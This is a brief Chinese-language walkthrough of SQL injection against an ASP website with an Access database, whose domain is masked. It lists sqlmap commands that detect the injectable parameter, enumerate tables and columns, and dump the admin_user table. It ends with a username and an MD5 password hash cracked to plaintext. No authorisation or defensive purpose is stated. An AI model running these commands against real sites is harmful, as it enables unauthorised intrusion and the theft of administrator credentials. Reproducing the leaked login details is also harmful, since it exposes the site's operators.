http://www.xxxxx.com/common.asp?id=1
通过url分析可以猜出使用的是access数据库
cmd 中 python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 检查网站是否存在可注入点。
通过返回可发现数据库使用的是access
python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 --tables 检查access数据库中的表
得到以上几个库,可以猜测admin_user中存放我们所需要的
python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 --columns -T admin_user 查表中的字段
python sqlmap.py -u http://www.xxxxx.com/common.asp?id=1 --dump -T admin_user "admin,password" 查字段中的数据
得到登录名LYL passwd 明显MD5加密,解密后的到xkluo168